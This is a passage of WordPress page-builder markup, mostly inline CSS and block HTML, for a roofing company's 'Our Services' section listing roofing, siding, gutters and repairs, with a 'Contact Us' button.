class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-30f90495-ee55-4579-800d-d587d050d2fa background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"e581b9d6-7409-4b90-bcaf-3c205e32317a\"} -->\n<style type=\"text/css\"> .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e581b9d6-7409-4b90-bcaf-3c205e32317a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\"} -->\n<style type=\"text/css\"> .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"953dcb7c-b238-4718-b90a-88d1da2d4246\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-953dcb7c-b238-4718-b90a-88d1da2d4246\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"3ad3deef-c09c-435f-9bef-60608e900e64\"} -->\n<style type=\"text/css\"> .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3ad3deef-c09c-435f-9bef-60608e900e64\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"93c9f688-c757-4040-a3f6-7eb370a7507b\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"61ff780f-af32-46b2-9e22-40df4790a340\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-61ff780f-af32-46b2-9e22-40df4790a340 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde\"} -->\n<style type=\"text/css\"> .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"e09e3d4d-a9bf-4014-b461-dbc47b884dfa\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block 